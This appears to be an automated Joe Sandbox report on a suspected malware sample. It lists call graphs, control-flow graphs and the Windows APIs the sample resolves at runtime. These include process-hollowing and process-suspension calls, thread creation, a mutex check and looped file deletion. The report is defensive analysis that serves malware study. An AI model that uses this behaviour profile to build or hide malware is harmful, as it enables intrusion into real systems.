40ef23 47374->47335 47376 40ef2a 47374->47376 47376->47260 47377 40f048 47689 401e65 22 API calls 47377->47689 47379 40f054 47690 401e65 22 API calls 47379->47690 47381 40f066 47691 401e65 22 API calls 47381->47691 47383 40f086 47692 43bb2c 39 API calls _strftime 47383->47692 47385 40f093 47693 401e65 22 API calls 47385->47693 47387 40f09e 47694 401e65 22 API calls 47387->47694 47389 40f0af 47695 401e65 22 API calls 47389->47695 47391 40f0c4 47696 401e65 22 API calls 47391->47696 47393 40f0d5 47394 40f0dc StrToIntA 47393->47394 47697 409e1f 169 API calls _wcslen 47394->47697 47396 40f0ee 47698 401e65 22 API calls 47396->47698 47398 40f0f7 47399 40f13c 47398->47399 47699 43455e 47398->47699 47707 401e65 22 API calls 47399->47707 47404 40f11f 47407 40f126 CreateThread 47404->47407 47405 40f194 47709 401e65 22 API calls 47405->47709 47406 40f14c 47406->47405 47408 43455e new 22 API calls 47406->47408 47407->47399 47838 41a045 102 API calls 2 library calls 47407->47838 47410 40f161 47408->47410 47708 401e65 22 API calls 47410->47708 47412 40f173 47417 40f17a CreateThread 47412->47417 47413 40f207 47715 401e65 22 API calls 47413->47715 47414 40f19d 47414->47413 47710 401e65 22 API calls 47414->47710 47417->47405 47835 41a045 102 API calls 2 library calls 47417->47835 47418 40f1b9 47711 401e65 22 API calls 47418->47711 47419 40f255 47720 41b69e 79 API calls 47419->47720 47420 40f210 47420->47419 47716 401e65 22 API calls 47420->47716 47424 40f1ce 47712 40da23 31 API calls 47424->47712 47425 40f25e 47721 401f13 28 API calls 47425->47721 47426 40f225 47717 401e65 22 API calls 47426->47717 47428 40f269 47722 401f09 11 API calls 47428->47722 47432 40f1e1 47713 401f13 28 API calls 47432->47713 47433 40f272 CreateThread 47438 40f293 CreateThread 47433->47438 47439 40f29f 47433->47439 47836 40f7e2 120 API calls 47433->47836 47434 40f23a 47718 43bb2c 39 API calls _strftime 47434->47718 47437 40f1ed 47714 401f09 11 API calls 47437->47714 47438->47439 47837 412132 137 API calls 47438->47837 47441 40f2b4 47439->47441 47442 40f2a8 CreateThread 47439->47442 47446 40f307 47441->47446 47723 402093 28 API calls 47441->47723 47442->47441 47832 412716 38 API calls ___scrt_get_show_window_mode 47442->47832 47444 40f1f6 CreateThread 47444->47413 47833 401be9 49 API calls _strftime 47444->47833 47445 40f247 47719 40c19d 7 API calls 47445->47719 47725 41353a RegOpenKeyExA RegQueryValueExA RegCloseKey 47446->47725 47449 40f2d7 47724 4052fd 28 API calls 47449->47724 47452 40f31f 47452->47304 47726 41bcef 28 API calls 47452->47726 47457 40f338 47727 413656 31 API calls 47457->47727 47462 40f34e 47728 401f09 11 API calls 47462->47728 47464 40f381 DeleteFileW 47465 40f388 47464->47465 47466 40f359 47464->47466 47731 41bcef 28 API calls 47465->47731 47466->47464 47466->47465 47467 40f36f Sleep 47466->47467 47467->47466 47469 434a15 47468->47469 47469->47173 47470 4434bf 47469->47470 47840 44323c 47470->47840 47473->47155 47474->47160 47475->47158 47476->47163 47477->47175 47478->47162 47479->47181 47480->47183 47485 44fbe8 47481->47485 47484 438fda 8 API calls 3 library calls 47484->47184 47486 44fc05 47485->47486 47489 44fc01 47485->47489 47486->47489 47491 449d26 47486->47491 47488 43464e 47488->47187 47488->47484 47503 43502b 47489->47503 47492 449d32 ___FrameUnwindToState 47491->47492 47510 445909 EnterCriticalSection 47492->47510 47494 449d39 47511 450203 47494->47511 47496 449d48 47497 449d57 47496->47497 47522 449bba 23 API calls 47496->47522 47524 449d73 LeaveCriticalSection std::_Lockit::~_Lockit 47497->47524 47500 449d68 ___FrameUnwindToState 47500->47486 47501 449d52 47523 449c70 GetStdHandle GetFileType 47501->47523 47504 435036 IsProcessorFeaturePresent 47503->47504 47505 435034 47503->47505 47507 435078 47504->47507 47505->47488 47546 43503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47507->47546 47509 43515b 47509->47488 47510->47494 47512 45020f ___FrameUnwindToState 47511->47512 47513 450233 47512->47513 47514 45021c 47512->47514 47525 445909 EnterCriticalSection 47513->47525 47533 44062d 20 API calls __dosmaperr 47514->47533 47517 45026b 47534 450292 LeaveCriticalSection std::_Lockit::~_Lockit 47517->47534 47519 450221 ___FrameUnwindToState ___std_exception_copy 47519->47496 47520 45023f 47520->47517 47526 450154 47520->47526 47522->47501 47523->47497 47524->47500 47525->47520 47535 445b74 47526->47535 47528 450173 47543 446802 20 API calls __dosmaperr 47528->47543 47529 450166 47529->47528 47542 448b04 11 API calls 2 library calls 47529->47542 47531 4501c5 47531->47520 47533->47519 47534->47519 47540 445b81 ___crtLCMapStringA 47535->47540 47536 445bc1 47545 44062d 20 API calls __dosmaperr 47536->47545 47537 445bac RtlAllocateHeap 47539 445bbf 47537->47539 47537->47540 47539->47529 47540->47536 47540->47537 47544 443001 7 API calls 2 library calls 47540->47544 47542->47529 47543->47531 47544->47540 47545->47539 47546->47509 47548 434bb8 GetStartupInfoW 47547->47548 47548->47192 47550 44f0eb 47549->47550 47551 44f0e2 47549->47551 47550->47196 47554 44efd8 48 API calls 5 library calls 47551->47554 47553->47196 47554->47550 47556 41cc20 LoadLibraryA GetProcAddress 47555->47556 47557 41cc10 GetModuleHandleA GetProcAddress 47555->47557 47558 41cc49 44 API calls 47556->47558 47559 41cc39 LoadLibraryA GetProcAddress 47556->47559 47557->47556 47558->47200 47559->47558 47737 41b539 FindResourceA 47560->47737 47564 40f428 ctype 47747 4020b7 47564->47747 47567 401fe2 28 API calls 47568 40f44e 47567->47568 47569 401fd8 11 API calls 47568->47569 47570 40f457 47569->47570 47571 43bda0 new 21 API calls 47570->47571 47572 40f468 ctype 47571->47572 47753 406e13 47572->47753 47574 40f49b 47574->47202 47576 40210c 47575->47576 47577 4023ce 11 API calls 47576->47577 47578 402126 47577->47578 47579 402569 28 API calls 47578->47579 47580 402134 47579->47580 47580->47205 47807 4020df 47581->47807 47583 41bf2f 47584 401fd8 11 API calls 47583->47584 47585 41bf61 47584->47585 47587 401fd8 11 API calls 47585->47587 47586 41bf31 47588 4041a2 28 API calls 47586->47588 47590 41bf69 47587->47590 47592 41bf3d 47588->47592 47591 401fd8 11 API calls 47590->47591 47593 40ea5f 47591->47593 47594 401fe2 28 API calls 47592->47594 47603 40fb52 47593->47603 47596 41bf46 47594->47596 47595 401fe2 28 API calls 47602 41bebf 47595->47602 47597 401fd8 11 API calls 47596->47597 47599 41bf4e 47597->47599 47598 401fd8 11 API calls 47598->47602 47815 41cec5 28 API calls 47599->47815 47602->47583 47602->47586 47602->47595 47602->47598 47811 4041a2 47602->47811 47814 41cec5 28 API calls 47602->47814 47604 40fb5e 47603->47604 47606 40fb65 47603->47606 47822 402163 11 API calls 47604->47822 47606->47210 47608 402163 47607->47608 47612 40219f 47608->47612 47823 402730 11 API calls 47608->47823 47610 402184 47824 402712 11 API calls std::_Deallocate 47610->47824 47612->47212 47613->47217 47614->47222 47615->47226 47616->47229 47618 401ff1 47617->47618 47625 402039 47617->47625 47619 4023ce 11 API calls 47618->47619 47620 401ffa 47619->47620 47621 40203c 47620->47621 47622 402015 47620->47622 47826 40267a 11 API calls 47621->47826 47825 403098 28 API calls 47622->47825 47626 401fd8 47625->47626 47627 4023ce 11 API calls 47626->47627 47628 401fe1 47627->47628 47628->47237 47629->47241 47630->47243 47631->47245 47632->47247 47633->47254 47827 401fab 47634->47827 47636 40d0ae CreateMutexA GetLastError 47636->47259 47637->47218 47638->47220 47639->47225 47640->47230 47642->47251 47643->47264 47644->47267 47645->47255 47646->47266 47647->47275 47648->47283 47649->47276 47650->47291 47651->47268 47652->47274 47653->47282 47654->47289 47655->47292 47656->47297 47657->47303 47658->47307 47659->47312 47660->47314 47661->47316 47662->47323 47663->47329 47664->47334 47665->47341 47666->47343 47667->47349 47668->47322 47669->47328 47670->47333 47671->47338 47672->47347 47673->47350 47674->47354 47675->47361 47676->47365 47677->47369 47678->47374 47679->47335 47680->47339 47681->47348 47682->47355 47683->47357 47684->47360 47685->47366 47686->47370 47687->47373 47688->47377 47689->47379 47690->47381 47691->47383 47692->47385 47693->47387 47694->47389 47695->47391 47696->47393 47697->47396 47698->47398 47703 434563 47699->47703 47700 43bda0 new 21 API calls 47700->47703 47701 40f10c 47706 401e65 22 API calls 47701->47706 47703->47700 47703->47701 47828 443001 7 API calls 2 library calls 47703->47828 47829 434c99 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47703->47829 47830 4352fb RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47703->47830 47706->47404 47707->47406 47708->47412 47709->47414 47710->47418 47711->47424 47712->47432 47713->47437 47714->47444 47715->47420 47716->47426 47717->47434 47718->47445 47719->47419 47720->47425 47721->47428 47722->47433 47723->47449 47725->47452 47726->47457 47727->47462 47728->47466 47729->47273 47731->47288 47732->47296 47733->47301 47734->47304 47735->47308 47831 41ada8 104 API calls 47736->47831 47738 41b556 LoadResource LockResource SizeofResource 47737->47738 47739 40f419 47737->47739 47738->47739 47740 43bda0 47739->47740 47746 4461b8 ___crtLCMapStringA 47740->47746 47741 4461f6 47757 44062d 20 API calls __dosmaperr 47741->47757 47743 4461e1 RtlAllocateHeap 47744 4461f4 47743->47744 47743->47746 47744->47564 47746->47741 47746->47743 47756 443001 7 API calls 2 library calls 47746->47756 47748 4020bf 47747->47748 47758 4023ce 47748->47758 47750 4020ca 47762 40250a 47750->47762 47752 4020d9 47752->47567 47754 4020b7 28 API calls 47753->47754 47755 406e27 47754->47755 47755->47574 47756->47746 47757->47744 47759 402428 47758->47759 47760 4023d8 47758->47760 47759->47750 47760->47759 47769 4027a7 11 API calls std::_Deallocate 47760->47769 47763 40251a 47762->47763 47764 402520 47763->47764 47765 402535 47763->47765 47770 402569 47764->47770 47780 4028e8 47765->47780 47768 402533 47768->47752 47769->47759 47791 402888 47770->47791 47772 40257d 47773 402592 47772->47773 47774 4025a7 47772->47774 47796 402a34 22 API calls 47773->47796 47776 4028e8 28 API calls 47774->47776 47779 4025a5 47776->47779 47777 40259b 47797 4029da 22 API calls 47777->47797 47779->47768 47781 4028f1 47780->47781 47782 402953 47781->47782 47783 4028fb 47781->47783 47805 4028a4 22 API calls 47782->47805 47786 402904 47783->47786 47787 402917 47783->47787 47799 402cae 47786->47799 47789 402915 47787->47789 47790 4023ce 11 API calls 47787->47790 47789->47768 47790->47789 47792 402890 47791->47792 47793 402898 47792->47793 47798 402ca3 22 API calls 47792->47798 47793->47772 47796->47777 47797->47779 47800 402cb8 __EH_prolog 47799->47800 47806 402e54 22 API calls 47800->47806 47802 4023ce 11 API calls 47804 402d92 47802->47804 47803 402d24 47803->47802 47804->47789 47806->47803 47808 4020e7 47807->47808 47809 4023ce 11 API calls 47808->47809 47810 4020f2 47809->47810 47810->47602 47816 40423a 47811->47816 47814->47602 47815->47583 47817 404243 47816->47817 47818 4023ce 11 API calls 47817->47818 47819 40424e 47818->47819 47820 402569 28 API calls 47819->47820 47821 4041b5 47820->47821 47821->47602 47822->47606 47823->47610 47824->47612 47825->47625 47826->47625 47828->47703 47839 412829 61 API calls 47837->47839 47841 443248 _GetRangeOfTrysToCheck 47840->47841 47842 443396 _abort GetModuleHandleW 47841->47842 47850 443260 47841->47850 47844 443254 47842->47844 47844->47850 47874 4433da GetModuleHandleExW 47844->47874 47845 443268 47849 4432dd 47845->47849 47861 443306 47845->47861 47882 443ff0 20 API calls _abort 47845->47882 47853 4432f5 47849->47853 47883 444276 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 47849->47883 47862 445909 EnterCriticalSection 47850->47862 47851 443323 47866 443355 47851->47866 47852 44334f 47885 4577a9 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 47852->47885 47884 444276 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 47853->47884 47863 443346 47861->47863 47862->47845 47886 445951 LeaveCriticalSection 47863->47886 47865 44331f 47865->47851 47865->47852 47887 448d49 47866->47887 47869 443383 47872 4433da _abort 8 API calls 47869->47872 47870 443363 GetPEB 47870->47869 47871 443373 GetCurrentProcess TerminateProcess 47870->47871 47871->47869 47873 44338b ExitProcess 47872->47873 47875 443404 GetProcAddress 47874->47875 47876 443427 47874->47876 47877 443419 47875->47877 47878 443436 47876->47878 47879 44342d FreeLibrary 47876->47879 47877->47876 47880 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 47878->47880 47879->47878 47881 443440 47880->47881 47881->47850 47882->47849 47883->47853 47884->47861 47886->47865 47888 448d6e 47887->47888 47892 448d64 47887->47892 47893 44854a 47888->47893 47890 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 47891 44335f 47890->47891 47891->47869 47891->47870 47892->47890 47894 448576 47893->47894 47895 44857a 47893->47895 47894->47895 47899 44859a 47894->47899 47900 4485e6 47894->47900 47895->47892 47897 4485a6 GetProcAddress 47898 4485b6 __crt_fast_encode_pointer 47897->47898 47898->47895 47899->47895 47899->47897 47901 448607 LoadLibraryExW 47900->47901 47902 4485fc 47900->47902 47903 448624 GetLastError 47901->47903 47905 44863c 47901->47905 47902->47894 47903->47905 47906 44862f LoadLibraryExW 47903->47906 47904 448653 FreeLibrary 47904->47902 47905->47902 47905->47904 47906->47905 47907 40165e 47908 401666 47907->47908 47909 401669 47907->47909 47910 4016a8 47909->47910 47912 401696 47909->47912 47911 43455e new 22 API calls 47910->47911 47914 40169c 47911->47914 47913 43455e new 22 API calls 47912->47913 47913->47914

                                                      Control-flow Graph

                                                      APIs
                                                      • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                                      • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                                      • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                                      • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                                      • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                                      • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                                      • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                      • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                                      • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                                      • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                                      • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                      • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                                      • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                      • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                      • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CD17
                                                      • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040EA1C), ref: 0041CD28
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CD2B
                                                      • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CD3B
                                                      • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CD4B
                                                      • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040EA1C), ref: 0041CD5D
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CD60
                                                      • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040EA1C), ref: 0041CD6D
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CD70
                                                      • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CD84
                                                      • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CD98
                                                      • LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040EA1C), ref: 0041CDAA
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CDAD
                                                      • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040EA1C), ref: 0041CDBA
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CDBD
                                                      • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040EA1C), ref: 0041CDCA
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CDCD
                                                      • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040EA1C), ref: 0041CDDA
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CDDD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$LibraryLoad$HandleModule
                                                      • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                      • API String ID: 4236061018-3687161714
                                                      • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                      • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                                                      • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                      • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 465 443355-443361 call 448d49 468 443383-44338f call 4433da ExitProcess 465->468 469 443363-443371 GetPEB 465->469 469->468 470 443373-44337d GetCurrentProcess TerminateProcess 469->470 470->468
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(00000003,PkGNG,0044332B,00000003,0046E958,0000000C,00443482,00000003,00000002,00000000,PkGNG,004461B7,00000003), ref: 00443376
                                                      • TerminateProcess.KERNEL32(00000000), ref: 0044337D
                                                      • ExitProcess.KERNEL32 ref: 0044338F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$CurrentExitTerminate
                                                      • String ID: PkGNG
                                                      • API String ID: 1703294689-263838557
                                                      • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                      • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                                      • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                      • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 5 40ea00-40ea82 call 41cbe1 GetModuleFileNameW call 40f3fe call 4020f6 * 2 call 41beac call 40fb52 call 401e8d call 43fd50 22 40ea84-40eac9 call 40fbee call 401e65 call 401fab call 410f72 call 40fb9f call 40f3eb 5->22 23 40eace-40eb96 call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->23 49 40ef2d-40ef3e call 401fd8 22->49 69 40eb98-40ebe3 call 406c59 call 401fe2 call 401fd8 call 401fab call 413584 23->69 70 40ebe9-40ec04 call 401e65 call 40b9f8 23->70 69->70 100 40f38a-40f3a5 call 401fab call 4139e4 call 4124b0 69->100 79 40ec06-40ec25 call 401fab call 413584 70->79 80 40ec3e call 40d0a4 70->80 79->80 98 40ec27-40ec3d call 401fab call 4139e4 79->98 85 40ec43-40ec45 80->85 88 40ec47-40ec49 85->88 89 40ec4e-40ec55 85->89 92 40ef2c 88->92 93 40ec57 89->93 94 40ec59-40ec65 call 41b354 89->94 92->49 93->94 104 40ec67-40ec69 94->104 105 40ec6e-40ec72 94->105 98->80 126 40f3aa-40f3db call 41bcef call 401f04 call 413a5e call 401f09 * 2 100->126 104->105 108 40ecb1-40ecc4 call 401e65 call 401fab 105->108 109 40ec74-40ec7b call 407751 105->109 127 40ecc6 call 407790 108->127 128 40eccb-40ed53 call 401e65 call 41bcef call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->128 120 40ec87-40ec9a call 401e65 call 401fab 109->120 121 40ec7d-40ec82 call 407773 call 40729b 109->121 120->108 141 40ec9c-40eca2 120->141 121->120 156 40f3e0-40f3ea call 40dd7d call 414f65 126->156 127->128 177 40ed55-40ed6e call 401e65 call 401fab call 43bb56 128->177 178 40edbb-40edbf 128->178 141->108 144 40eca4-40ecaa 141->144 144->108 147 40ecac call 40729b 144->147 147->108 177->178 203 40ed70-40ed74 call 401e65 177->203 179 40ef41-40efa1 call 436f10 call 40247c call 401fab * 2 call 413733 call 409092 178->179 180 40edc5-40edcc 178->180 234 40efa6-40effa call 401e65 call 401fab call 402093 call 401fab call 4137aa call 401e65 call 401fab call 43bb2c 179->234 182 40ee4a-40ee54 call 409092 180->182 183 40edce-40ee48 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40ce34 180->183 193 40ee59-40ee7d call 40247c call 434829 182->193 183->193 211 40ee8c 193->211 212 40ee7f-40ee8a call 436f10 193->212 213 40ed79-40edb6 call 401fab call 401e65 call 401fab call 40da6f call 401f13 call 401f09 203->213 217 40ee8e-40ef03 call 401f04 call 43f859 call 40247c call 401fab call 40247c call 401fab call 413982 call 434832 call 401e65 call 40b9f8 211->217 212->217 213->178 217->234 288 40ef09-40ef28 call 401e65 call 41bcef call 40f4af 217->288 286 40f017-40f019 234->286 287 40effc 234->287 290 40f01b-40f01d 286->290 291 40f01f 286->291 289 40effe-40f015 call 41ce2c CreateThread 287->289 288->234 306 40ef2a 288->306 294 40f025-40f101 call 402093 * 2 call 41b580 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409e1f call 401e65 call 401fab 289->294 290->289 291->294 344 40f103-40f13a call 43455e call 401e65 call 401fab CreateThread 294->344 345 40f13c 294->345 306->92 346 40f13e-40f156 call 401e65 call 401fab 344->346 345->346 356 40f194-40f1a7 call 401e65 call 401fab 346->356 357 40f158-40f18f call 43455e call 401e65 call 401fab CreateThread 346->357 367 40f207-40f21a call 401e65 call 401fab 356->367 368 40f1a9-40f202 call 401e65 call 401fab call 401e65 call 401fab call 40da23 call 401f13 call 401f09 CreateThread 356->368 357->356 379 40f255-40f279 call 41b69e call 401f13 call 401f09 367->379 380 40f21c-40f250 call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 40c19d 367->380 368->367 400 40f27b 379->400 401 40f27e-40f291 CreateThread 379->401 380->379 400->401 404 40f293-40f29d CreateThread 401->404 405 40f29f-40f2a6 401->405 404->405 408 40f2b4-40f2bb 405->408 409 40f2a8-40f2b2 CreateThread 405->409 412 40f2c9 408->412 413 40f2bd-40f2c0 408->413 409->408 418 40f2ce-40f302 call 402093 call 4052fd call 402093 call 41b580 call 401fd8 412->418 415 40f2c2-40f2c7 413->415 416 40f307-40f322 call 401fab call 41353a 413->416 415->418 416->156 427 40f328-40f368 call 41bcef call 401f04 call 413656 call 401f09 call 401f04 416->427 418->416 443 40f381-40f386 DeleteFileW 427->443 444 40f388 443->444 445 40f36a-40f36d 443->445 444->126 445->126 446 40f36f-40f37c Sleep call 401f04 445->446 446->443
                                                      APIs
                                                        • Part of subcall function 0041CBE1: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                                        • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                                        • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                        • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                                        • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                                        • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                                        • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                                        • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                                        • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                                        • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                                        • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                                        • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                                        • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                        • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                        • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                        • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                                        • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                                        • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                                        • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                        • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                                        • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                        • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                        • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                        • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
